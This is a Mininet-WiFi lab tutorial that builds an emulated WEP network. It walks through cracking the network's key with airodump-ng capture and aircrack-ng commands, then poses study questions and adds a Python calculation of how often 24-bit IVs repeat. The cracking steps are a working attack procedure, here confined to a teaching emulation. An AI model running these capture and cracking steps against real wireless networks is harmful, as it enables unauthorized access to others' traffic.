Cracking WEP Wi-Fi Encryption

Note

In this short demo you will learn how to crack a WEP key.

Requirements:

The VM available at the Mininet-WiFi’s source code repository already has all the requirements satisfied.

First of all, look at the network topology that the code below generates: three WEP stations and one WEP access point with SSID simplewifi on channel 1.

#!/usr/bin/python

'''@author: Ramon Fontes
   @email: ramon.fontes@imd.ufrn.br'''

from mininet.log import setLogLevel, info
from mn_wifi.cli import CLI
from mn_wifi.net import Mininet_wifi


def topology():
    "Create a network."
    net = Mininet_wifi()

    info("*** Creating nodes\n")
    sta1 = net.addStation('sta1', passwd='1234567891a', encrypt='wep')
    sta2 = net.addStation('sta2', passwd='123456789a', encrypt='wep')
    sta3 = net.addStation('sta3', passwd='123456789a', encrypt='wep')
    ap1 = net.addAccessPoint('ap1', ssid="simplewifi", mode="g", channel="1",
                             passwd='123456789a', encrypt='wep',
                             failMode="standalone", datapath='user')

    info("*** Configuring wifi nodes\n")
    net.configureWifiNodes()

    info("*** Associating Stations\n")
    net.addLink(sta1, ap1)
    net.addLink(sta2, ap1)
    net.addLink(sta3, ap1)

    info("*** Starting network\n")
    net.build()
    ap1.start([])

    info("*** Running CLI\n")
    CLI(net)

    info("*** Stopping network\n")
    net.stop()


if __name__ == '__main__':
    setLogLevel('info')
    topology()

Assuming the script is saved as wep.py, run it as follows:

~$ sudo python wep.py

and then create a monitor interface called mon0 for sta1:

mininet-wifi> sta1 iw dev sta1-wlan0 interface add mon0 type monitor
mininet-wifi> sta1 ifconfig mon0 up

Now open an xterm for sta1:

mininet-wifi> xterm sta1

Then we use airodump-ng to capture frames from the other wireless devices; aircrack-ng later runs statistical comparisons over that captured data to break the insecure WEP protocol. Enter the following command from sta1's terminal:

# airodump-ng mon0

Now tell your wireless interface to start storing the captured wireless data for the network of your choosing. Remember to plug in three key pieces of information from the previous output into the following command: the output file prefix (-w), the channel (-c) and the BSSID of the access point (--bssid):

# airodump-ng -w simplewifi -c 1 --bssid 02:00:00:00:03:00 mon0

Last but not least, the most important step of the process is to actually use the data captured from the WEP network. Issue the following command:

# aircrack-ng simplewifi-01.cap

If all goes according to plan, you should be able to break the WEP key. If the command fails, wait until your wireless card has captured more data; give it time to capture 15,000 packets and then try again.

Questions

  • Q1. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5,000 packets. Why?

  • Q2. Is there any way to be protected from this WEP key attack?
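The following worked calculation, added here as an illustration for Q1 and not part of the original demo, models WEP's 24-bit IV space as a birthday problem: with N = 2^24 possible IVs chosen uniformly at random, the probability that at least one IV value repeats among n packets grows as 1 - exp(-n(n-1)/2N), and the number of packets at which that probability reaches 50% is computed by inverting that expression. The function names and the uniform-IV assumption are this example's own; real drivers often pick IVs sequentially, which only makes repeats arrive sooner.

```python
import math

IV_BITS = 24                # WEP prepends a 24-bit IV to the RC4 key
IV_SPACE = 1 << IV_BITS     # 2**24 = 16,777,216 distinct IVs


def repeat_probability_exact(packets, space=IV_SPACE):
    """Exact birthday-problem probability that at least two of `packets`
    uniformly random IVs drawn from `space` values are identical."""
    if packets > space:
        return 1.0              # pigeonhole: a repeat is guaranteed
    p_all_distinct = 1.0
    for i in range(packets):
        p_all_distinct *= (space - i) / space
    return 1.0 - p_all_distinct


def repeat_probability_approx(packets, space=IV_SPACE):
    """Standard approximation 1 - exp(-n(n-1) / (2N))."""
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * space))


def packets_for_probability(target=0.5, space=IV_SPACE):
    """Smallest n for which the approximate repeat probability is >= target.
    Inverts n(n-1) >= -2N ln(1 - target) by solving the quadratic."""
    c = -2.0 * space * math.log(1.0 - target)
    n = math.ceil((1 + math.sqrt(1 + 4 * c)) / 2)
    # guard against rounding on the boundary
    while repeat_probability_approx(n, space) < target:
        n += 1
    while n > 1 and repeat_probability_approx(n - 1, space) >= target:
        n -= 1
    return n


if __name__ == "__main__":
    n50 = packets_for_probability(0.5)
    print("IV space size:", IV_SPACE)
    print("packets for a 50% chance of an IV repeat:", n50)
    for n in (1000, n50, 5000, 15000):
        print("n=%5d  P(repeat) exact=%.4f  approx=%.4f"
              % (n, repeat_probability_exact(n), repeat_probability_approx(n)))
```

Running the script shows the 50% point at roughly 4,800 packets, which is the figure Q1 rounds to 5,000; at the 15,000 packets the demo suggests waiting for, a repeat is essentially certain. The block models the defender-relevant point, namely why a 24-bit IV is too small for a stream cipher that must never reuse a keystream; the actual key-recovery attacks that aircrack-ng implements exploit weak RC4 key schedules rather than waiting for collisions, so in practice the IV space is exhausted in minutes on a busy network.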